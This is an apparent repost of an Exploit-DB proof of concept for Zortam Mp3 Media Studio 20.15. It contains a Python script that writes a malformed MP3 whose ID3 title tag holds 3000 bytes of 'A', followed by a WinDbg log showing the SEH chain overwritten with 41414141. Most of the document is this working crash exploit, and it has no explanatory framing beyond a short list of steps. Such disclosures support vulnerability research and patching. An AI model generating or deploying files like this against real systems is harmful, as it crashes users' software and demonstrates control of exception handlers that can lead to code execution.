Zortam Mp3 Media Studio 20.15 – Overflow (PoC) (SEH) - 体验盒子

作者： INSECT.B
日期： 2016-03-14
类别：
dos
平台：
windows
来源：https://www.exploit-db.com/exploits/39557/
#-*- coding: utf-8 -*-

#

# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS

# Date: 2016-03-12

# Author: INSECT.B

# Facebook : https://www.facebook.com/B.INSECT00

# GitHub : binsect00

# Blog : http://binsect00.tistory.com

# Vendor Homepage : http://www.zortam.com

# Software Link: http://www.zortam.com/download.html

# Version: 20.15

# Tested on: Windows7 Professional SP1 En x86 

# CVE : N/A

#

# Detail..

#1. Zortam Mp3 Media Studio is program that change tags sound file

#2. If tag length over certain length, program is occured crash.

#3. Make mp3 file. title tag length is 3000.

#4. program open. and serching Directory





id3Id = '\x49\x44\x33' #ID3

id3Version = '\x03\x00'

id3Flag = '\x00'

id3Size = '\x00\x00\x2F\x2D'

id3 = id3Id + id3Version + id3Flag + id3Size



frameId = '\x54\x49\x54\x32' #TIT2

frameSize = '\x00\x00\x0B\xB9' #Frame Size

frameFlag = '\x00\x00'

textEncoding = '\x00'

textInfo = 'A'*3000

frame = frameId + frameSize + frameFlag + textEncoding + textInfo





padding = '\x00'*1100



payload = id3 + frame + padding

with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f:

	f.write(payload)



'''

STATUS_STACK_BUFFER_OVERRUN encountered

(aa4.c08): Break instruction exception - code 80000003 (first chance)

eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640

eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0 nv up ei pl zr na pe nc

cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00200246

*** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 

kernel32!FormatMessageA+0x14031:

7619e109 ccint 3

0:000> !exchain

0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)

0012f2b8: 41414141

Invalid exception stack at 41414141

'''